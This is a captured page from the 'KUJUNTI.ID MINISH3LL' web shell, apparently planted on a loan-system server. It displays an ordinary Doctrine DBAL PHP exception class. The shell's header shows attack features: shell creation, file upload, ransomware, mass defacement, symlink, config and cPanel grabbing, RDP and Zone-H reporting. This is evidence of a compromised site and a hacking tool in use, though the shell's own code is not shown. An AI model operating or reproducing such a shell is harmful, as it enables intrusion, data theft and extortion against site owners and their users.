KUJUNTI.ID MINISH3LL
Path : /var/www/html/thb_loan_system/vendor/doctrine/dbal/src/Driver/PgSQL/Exception/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/thb_loan_system/vendor/doctrine/dbal/src/Driver/PgSQL/Exception/UnknownParameter.php


<?php

namespace Doctrine\DBAL\Driver\PgSQL\Exception;

use Doctrine\DBAL\Driver\AbstractException;

use function sprintf;

/** @psalm-immutable */
final class UnknownParameter extends AbstractException
{
    public static function new(string $param): self
    {
        return new self(
            sprintf('Could not find parameter %s in the SQL statement', $param),
        );
    }
}

© KUJUNTI.ID